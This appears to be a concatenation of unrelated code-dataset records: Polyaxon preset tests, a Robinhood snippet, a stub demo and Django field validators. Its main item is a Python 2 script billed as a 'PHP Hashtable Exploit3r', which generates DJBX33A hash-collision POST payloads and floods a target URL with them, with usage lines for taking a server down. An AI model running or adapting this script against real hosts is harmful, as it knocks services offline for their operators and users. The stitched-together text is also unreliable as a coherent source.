self.assert_environment(environment1, environment2)
def test_compile_injects_service_account_name(self):
environment1 = {"serviceAccountName": "sa1"}
environment2 = {"serviceAccountName": "sa2"}
self.assert_environment(environment1, environment2)
def test_compile_injects_image_pull_secrets(self):
environment1 = {"imagePullSecrets": ["ps1", "ps2"]}
environment2 = {"imagePullSecrets": ["ps3"]}
self.assert_environment(environment1, environment2)
def test_compile_injects_security_context(self):
environment1 = {"securityContext": {"runAsUser": 1000, "runAsGroup": 3000}}
environment2 = {"securityContext": {"runAsUser": 100, "runAsGroup": 300}}
self.assert_environment(environment1, environment2)
@pytest.mark.polyaxonfile_mark
class TestApplyPresetPlugins(BaseTestApplyPreset):
def assert_plugins(self, plugins1, plugins2):
self.preset["plugins"] = plugins1
assert self.compiled_operation.plugins is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.plugins is not None
env = self.compiled_operation.plugins.to_dict()
assert env == plugins1
# Updating the preset
self.preset["plugins"] = plugins2
plugins = self.compiled_operation.plugins.to_dict()
assert plugins == plugins1
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.plugins is not None
plugins = self.compiled_operation.plugins.to_dict()
assert plugins == plugins2
def test_compile_injects_log_level(self):
plugins = {"logLevel": "DEBUG"}
plugins2 = {"logLevel": "INFO"}
self.assert_plugins(plugins, plugins2)
def test_compile_injects_auth(self):
plugins = {"auth": True}
plugins2 = {"auth": False}
self.assert_plugins(plugins, plugins2)
def test_compile_injects_docker(self):
plugins = {"docker": True}
plugins2 = {"docker": False}
self.assert_plugins(plugins, plugins2)
def test_compile_injects_shm(self):
plugins = {"shm": True}
plugins2 = {"shm": False}
self.assert_plugins(plugins, plugins2)
@pytest.mark.polyaxonfile_mark
class TestApplyPresetTermination(BaseTestApplyPreset):
def assert_termination(self, termination1, termination2):
self.preset["termination"] = termination1
assert self.compiled_operation.termination is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination1
# Updating the preset
self.preset["termination"] = termination2
assert self.compiled_operation.termination.to_dict() == termination1
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination2
def test_compile_injects_max_retries(self):
termination1 = {"maxRetries": 10}
termination2 = {"maxRetries": 1}
self.assert_termination(termination1, termination2)
def test_compile_injects_timeout(self):
termination1 = {"timeout": 10}
termination2 = {"timeout": 1}
self.assert_termination(termination1, termination2)
def test_compile_injects_ttl(self):
termination1 = {"ttl": 10}
termination2 = {"ttl": 1}
self.assert_termination(termination1, termination2)
@pytest.mark.polyaxonfile_mark
class TestApplyPreset(BaseTestApplyPreset):
def test_patch_does_not_alter_with_no_preset(self):
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=None,
)
== self.compiled_operation
)
def test_patch_does_not_alter_with_preset_with_no_environment_or_contexts_or_termination(
self,
):
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
def test_patch_environment_and_termination(self):
termination1 = {"maxRetries": 1, "timeout": 1, "ttl": 1}
environment1 = {
"labels": {"label1": "value1"},
"annotations": {"anno1": "value1"},
"nodeSelector": {"plx": "selector1"},
"affinity": {"podAffinity": {}},
"tolerations": [{"key": "key1", "operator": "Exists"}],
"serviceAccountName": "sa1",
"imagePullSecrets": ["ps1", "ps2"],
"securityContext": {"runAsUser": 1000, "runAsGroup": 3000},
}
plugins1 = {
"logLevel": "DEBUG",
"auth": True,
"docker": True,
"shm": True,
}
self.preset["termination"] = termination1
self.preset["runPatch"]["environment"] = environment1
self.preset["plugins"] = plugins1
assert self.compiled_operation.termination is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination1
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment1
assert self.compiled_operation.plugins is not None
assert self.compiled_operation.plugins.to_dict() == plugins1
termination2 = {"maxRetries": 10, "timeout": 10, "ttl": 10}
environment2 = {
"labels": {"label1": "value12"},
"annotations": {"anno1": "value12"},
"nodeSelector": {"plx": "selector12"},
"affinity": {"podAffinity": {"k": "v"}},
"tolerations": [{"key": "key11", "operator": "NotExists"}],
"serviceAccountName": "sa2",
"imagePullSecrets": ["ps2", "ps22"],
"securityContext": {"runAsUser": 100, "runAsGroup": 300},
}
plugins2 = {
"logLevel": "INFO",
"auth": False,
"docker": False,
"shm": False,
}
# Updating the preset
self.preset["termination"] = termination2
self.preset["runPatch"]["environment"] = environment2
self.preset["plugins"] = plugins2
self.preset["patchStrategy"] = V1PatchStrategy.REPLACE
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == termination2
assert self.compiled_operation.termination is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment2
assert self.compiled_operation.plugins is not None
assert self.compiled_operation.plugins.to_dict() == plugins2
termination3 = {"maxRetries": 15}
environment3 = {
"labels": {},
"annotations": {},
"nodeSelector": {},
"affinity": {"podAffinity": {"k": "v"}},
"tolerations": [],
"securityContext": {"runAsUser": 10, "runAsGroup": 30},
"serviceAccountName": "sa2",
"imagePullSecrets": ["ps2", "ps22"],
}
# Updating the preset
self.preset["termination"] = termination3
self.preset["runPatch"]["environment"] = environment3
self.preset["patchStrategy"] = V1PatchStrategy.REPLACE
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.termination is not None
assert self.compiled_operation.termination.to_dict() == {
"maxRetries": 15,
"timeout": 10,
"ttl": 10,
}
assert self.compiled_operation.termination is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment3
assert self.compiled_operation.plugins is not None
assert self.compiled_operation.plugins.to_dict() == plugins2
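# (Editorial summary, inferred from the tests above) The four V1PatchStrategy
# values exercised here behave roughly as follows:
# REPLACE -- preset values overwrite the operation's values outright.
# ISNULL -- preset values apply only where the operation left a field unset.
# POST_MERGE -- deep merge with preset values winning on conflicts; list
# fields concatenate as operation + preset.
# PRE_MERGE -- deep merge with operation values winning on conflicts; list
# fields concatenate as preset + operation.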
|
[
"polyaxon.utils.tz_utils.now",
"polyaxon.polyflow.V1Operation",
"polyaxon.polyaxonfile.OperationSpecification.compile_operation",
"polyaxon.config_reader.utils.deep_update",
"polyaxon.polyaxonfile.OperationSpecification.apply_preset",
"polyaxon.polyflow.V1Component.from_dict",
"polyaxon.polyaxonfile.OperationSpecification.read"
] |
[((1356, 1434), 'polyaxon.polyaxonfile.OperationSpecification.read', 'OperationSpecification.read', (["{'version': pkg.SCHEMA_VERSION, 'hubRef': 'test'}"], {}), "({'version': pkg.SCHEMA_VERSION, 'hubRef': 'test'})\n", (1383, 1434), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((7432, 7466), 'polyaxon.polyflow.V1Component.from_dict', 'V1Component.from_dict', (['config_dict'], {}), '(config_dict)\n', (7453, 7466), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((12807, 13370), 'polyaxon.polyaxonfile.OperationSpecification.read', 'OperationSpecification.read', (["{'version': pkg.SCHEMA_VERSION, 'name': None, 'isPreset': True,\n 'description': '', 'tags': [], 'presets': [], 'queue': '', 'cache': {},\n 'termination': {}, 'plugins': {}, 'build': None, 'hooks': [], 'params':\n {}, 'runPatch': {'init': [], 'connections': [], 'container': {},\n 'environment': {'nodeSelector': {}, 'serviceAccountName': '',\n 'imagePullSecrets': []}}, 'schedule': None, 'events': [], 'joins': [],\n 'matrix': None, 'dependencies': [], 'trigger': None, 'conditions': None,\n 'skipOnUpstreamSkip': None}"], {}), "({'version': pkg.SCHEMA_VERSION, 'name': None,\n 'isPreset': True, 'description': '', 'tags': [], 'presets': [], 'queue':\n '', 'cache': {}, 'termination': {}, 'plugins': {}, 'build': None,\n 'hooks': [], 'params': {}, 'runPatch': {'init': [], 'connections': [],\n 'container': {}, 'environment': {'nodeSelector': {},\n 'serviceAccountName': '', 'imagePullSecrets': []}}, 'schedule': None,\n 'events': [], 'joins': [], 'matrix': None, 'dependencies': [],\n 'trigger': None, 'conditions': None, 'skipOnUpstreamSkip': None})\n", (12834, 13370), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((32975, 33355), 'polyaxon.polyaxonfile.OperationSpecification.read', 'OperationSpecification.read', (["{'version': 1.1, 'kind': 'operation', 'name': 'foo', 'description':\n 'a description', 'tags': ['tag1', 'tag2'], 'trigger': 'all_succeeded',\n 'component': {'name': 'build-template', 'tags': ['tag1', 'tag2'], 'run':\n {'kind': V1RunKind.JOB, 'container': {'image': 'test'}, 'init': [{\n 'connection': 'foo', 'git': {'revision': 'dev'}}]}}}"], {}), "({'version': 1.1, 'kind': 'operation', 'name':\n 'foo', 'description': 'a description', 'tags': ['tag1', 'tag2'],\n 'trigger': 'all_succeeded', 'component': {'name': 'build-template',\n 'tags': ['tag1', 'tag2'], 'run': {'kind': V1RunKind.JOB, 'container': {\n 'image': 'test'}, 'init': [{'connection': 'foo', 'git': {'revision':\n 'dev'}}]}}})\n", (33002, 33355), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((33692, 33741), 'polyaxon.polyaxonfile.OperationSpecification.compile_operation', 'OperationSpecification.compile_operation', (['op_spec'], {}), '(op_spec)\n', (33732, 33741), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((1162, 1167), 'polyaxon.utils.tz_utils.now', 'now', ([], {}), '()\n', (1165, 1167), False, 'from polyaxon.utils.tz_utils import now\n'), ((1257, 1262), 'polyaxon.utils.tz_utils.now', 'now', ([], {}), '()\n', (1260, 1262), False, 'from polyaxon.utils.tz_utils import now\n'), ((14140, 14167), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (14151, 14167), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((15350, 15377), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (15361, 15377), 
False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((17419, 17446), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (17430, 17446), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((18137, 18164), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (18148, 18164), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((18853, 18880), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (18864, 18880), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((19753, 19780), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (19764, 19780), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((20978, 21005), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (20989, 21005), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((26771, 26798), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (26782, 26798), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((27991, 28018), 'polyaxon.polyflow.V1Operation', 'V1Operation', ([], {'is_preset': '(True)'}), '(is_preset=True)\n', (28002, 28018), False, 'from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind\n'), ((31316, 31431), 'polyaxon.config_reader.utils.deep_update', 'deep_update', (["preset_dict['runPatch']['container']['resources']", "expected['runPatch']['container']['resources']"], {}), "(preset_dict['runPatch']['container']['resources'], expected[\n 'runPatch']['container']['resources'])\n", (31327, 31431), False, 'from polyaxon.config_reader.utils import deep_update\n'), ((34130, 34222), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (34165, 34222), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((34665, 34757), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (34700, 34757), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((35509, 35601), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (35544, 35601), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((36291, 36383), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (36326, 36383), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((38397, 38489), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 
'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (38432, 38489), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((38924, 39016), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (38959, 39016), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((40198, 40290), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (40233, 40290), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((40709, 40801), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (40744, 40801), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((41739, 41824), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'None'}), '(config=self.compiled_operation, preset=None\n )\n', (41774, 41824), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((42061, 42153), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (42096, 42153), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((43202, 43294), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (43237, 43294), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((44777, 44869), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (44812, 44869), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((46035, 46127), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (46070, 46127), False, 'from polyaxon.polyaxonfile import OperationSpecification\n')]
|
#! /usr/bin/env python
###########################
# Copyrights Please #
###########################
###########################
# My Original Code #
###########################
# WhoAmi :
#https://www.facebook.com/Gods.nd.kings
#https://www.facebook.com/clayteamwhoami
"""
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python Hashtable.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a server (make 500 requests without waiting for a response):
python Hashtable.py -u https://host/index.php -v -c 500 -t PHP
Changelog:
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
#############################
# LIBRARIES #
#############################
import socket
import sys, os
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
####################
# Main #
####################
def main():
parser = argparse.ArgumentParser(description="| Take down a remote PHP Host |"
"| Coder Name : WhoAmi |"
"| Team Name : <NAME> |"
,prog="PHP Hashtable Exploit3r")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB", default=8, type=int)
parser.add_argument("--version", action="version", version="%(prog)s 5.0")
#############################
# FUNCTIONS #
#############################
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
if options.target == "PHP":
payload = generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
#payload = generateJAVAPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to the maximum payload size (the option is given in MB; converted to bytes here)
maxbytes = options.maxpayloadsize*1024*1024
payload = payload[:maxbytes]
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generateASPPayload():
return "a=a"
def generateJAVAPayload():
return "b=b"
def generatePHPPayload():
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = computePHPCollisionChars(5)
return _generatePayload(a, 8)
def _generatePayload(collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = _base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += "" + urllib.quote(result) + "=&"
    return post
def _base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
    if num == 0:
        return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def computePHPCollisionChars(count):
hashes = {}
counter = 0
length = 2
a = ""
for i in range(1, 254):
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = _DJBX33A(basestr)
print("\tValue: %s\tHash: %s" % (basestr, basehash))
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
temphash = _DJBX33A(tempstr)
if temphash == basehash:
print("\tValue: %s\tHash: %s" % (tempstr, temphash))
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
                break
if counter != count:
print("Not enough values found. Please start the script again")
sys.exit(1)
return hashes
def _DJBX(inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(inputstring):
return _DJBX(inputstring, 33, 5381)
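# Illustrative check (not part of the original script): "Ez" and "FY" are a
# classic DJBX33A-colliding pair, and they also collide under this variant:
# 5381 + 33*ord('E') + ord('z') == 5381 + 33*ord('F') + ord('Y') == 7780.
assert _DJBX33A("Ez") == _DJBX33A("FY") == 7780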
#ASP
def _DJBX33X(inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
if __name__ == "__main__":
main()
|
[
"argparse.ArgumentParser",
"math.pow",
"urllib.quote",
"socket.socket",
"math.floor",
"random.choice",
"time.time",
"urlparse.urlparse",
"ssl.wrap_socket",
"itertools.product",
"sys.exit",
"string.partition"
] |
[((1149, 1346), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""| Take down a remote PHP Host || Coder Name : WhoAmi || Team Name : <NAME> |"""', 'prog': '"""PHP Hashtable Exploit3r v1.0"""'}), "(description=\n '| Take down a remote PHP Host || Coder Name : WhoAmi || Team Name : <NAME> |'\n , prog='PHP Hashtable Exploit3r v1.0')\n", (1172, 1346), False, 'import argparse\n'), ((2758, 2788), 'urlparse.urlparse', 'urlparse.urlparse', (['options.url'], {}), '(options.url)\n', (2775, 2788), False, 'import urlparse\n'), ((7361, 7383), 'math.pow', 'math.pow', (['size', 'length'], {}), '(size, length)\n', (7369, 7383), False, 'import math\n'), ((2894, 2905), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2902, 2905), False, 'import sys\n'), ((4540, 4589), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (4553, 4589), False, 'import socket\n'), ((7405, 7430), 'math.floor', 'math.floor', (['maxvaluefloat'], {}), '(maxvaluefloat)\n', (7415, 7430), False, 'import math\n'), ((8270, 8305), 'itertools.product', 'itertools.product', (['a'], {'repeat': 'length'}), '(a, repeat=length)\n', (8287, 8305), False, 'import itertools\n'), ((8329, 8350), 'random.choice', 'random.choice', (['source'], {}), '(source)\n', (8342, 8350), False, 'import random\n'), ((8978, 8989), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (8986, 8989), False, 'import sys\n'), ((4647, 4668), 'ssl.wrap_socket', 'ssl.wrap_socket', (['sock'], {}), '(sock)\n', (4662, 4668), False, 'import ssl\n'), ((5550, 5561), 'time.time', 'time.time', ([], {}), '()\n', (5559, 5561), False, 'import time\n'), ((6194, 6222), 'string.partition', 'string.partition', (["'\\r\\n\\r\\n'"], {}), "('\\r\\n\\r\\n')\n", (6210, 6222), False, 'import string\n'), ((3186, 3197), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3194, 3197), False, 'import sys\n'), ((3544, 3555), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3552, 3555), False, 'import sys\n'), ((6034, 6045), 'time.time', 'time.time', ([], {}), '()\n', (6043, 6045), False, 'import time\n'), ((7685, 7705), 'urllib.quote', 'urllib.quote', (['result'], {}), '(result)\n', (7697, 7705), False, 'import urllib\n'), ((9156, 9179), 'math.pow', 'math.pow', (['base', 'counter'], {}), '(base, counter)\n', (9164, 9179), False, 'import math\n'), ((3720, 3731), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3728, 3731), False, 'import sys\n'), ((3826, 3837), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3834, 3837), False, 'import sys\n'), ((9478, 9499), 'math.pow', 'math.pow', (['(33)', 'counter'], {}), '(33, counter)\n', (9486, 9499), False, 'import math\n')]
|
from Robinhood import Robinhood
from pprint import pprint
class Usage(Robinhood):
async def main(self):
await self.login()
options_dict = await self.get_option_positions_from_account()
pprint(options_dict)
if __name__ == '__main__':
    import asyncio
    instance = Usage()
    # main() is a coroutine; assuming the Robinhood wrapper is asyncio-based,
    # it has to be driven by an event loop or it never actually executes.
    asyncio.run(instance.main())
|
[
"pprint.pprint"
] |
[((216, 236), 'pprint.pprint', 'pprint', (['options_dict'], {}), '(options_dict)\n', (222, 236), False, 'from pprint import pprint\n')]
|
# use click
# specify environment and agent
# tell it to explore
# once it is done, you can inspect its mind
# you can reset its location in the env
# you can tell it to move to a new location
def demo():
    ''' demo mode is highly limited; intended only as a quick demonstration '''
from sensorimotor.lib import MetaEnvironment
MetaEnvironment()
if __name__ == '__main__':
demo()
|
[
"sensorimotor.lib.MetaEnvironment"
] |
[((311, 328), 'sensorimotor.lib.MetaEnvironment', 'MetaEnvironment', ([], {}), '()\n', (326, 328), False, 'from sensorimotor.lib import MetaEnvironment\n')]
|
from django.core.validators import RegexValidator
from django.utils.translation import gettext_lazy as _
"""
Algerian phone numbers validator.
"""
phone_validator = RegexValidator('^\\+?[0-9]{,12}$', _('The phone number you entered is not valid; '
                                                       'it must be in the international format, '
                                                       'for example \'+213799136332\'.'),
                                 'Invalid PhoneNumber')
"""
username validator for alphanumeric usernames that start with a letter and allow only the underscore as a special
character
"""
username_validator = RegexValidator('^[a-zA-Z]{1}[a-zA-Z_0-9]{6,}$', _('The username you entered is not valid; '
                                                                       'the allowed characters are:\n '
                                                                       'a-z, A-Z, 0-9, \'_\''), 'Invalid Username')
"""
Password validator requiring a minimum length of 8 characters.
"""
password_validator = RegexValidator('.{8,}', _('Invalid password. Password must contain at least 8'
                                               ' characters.'), 'Invalid Password')
"""
Names validator, allows only letters and spaces, cannot be blank.
"""
names_validator: RegexValidator = RegexValidator('^[a-zA-Z]+( [a-zA-Z]+)*$', _('Invalid name; names must contain only '
                                                                              'alphabetic characters, '
                                                                              'without leading or '
                                                                              'trailing spaces.'), 'Invalid Name')
"""
address validator, still under development.
"""
address_validator = RegexValidator('^[0-9]{,5}[,. ]{,1}[ a-zA-Z]{5,}([0-9]{,5}[ a-zA-Z]{5,})?$',
                                   _('Invalid address; I\'m sorry, I can\'t explain the pattern here.'),
                                   'Invalid Address')
"""
Algerian Registre Commerce number validator.
"""
register_validator = RegexValidator('^[0-9]{2}[a-zA-Z][0-9]{7}$', _('Invalid commerce register number or wrong format;'
                                                                    ' the format should be'
                                                                    ' "XXYXXXXXXX" (X=digit, Y=letter)'))
"""
Algerian Numero D'identifiant Fiscal validator.
"""
nif_validator = RegexValidator('^[0-9]{15}$', _('Invalid NIF number;'
                                               ' the format should be'
                                               ' "XXXXXXXXXXXXXXX" (X=digit)'))
|
[
"django.utils.translation.gettext_lazy"
] |
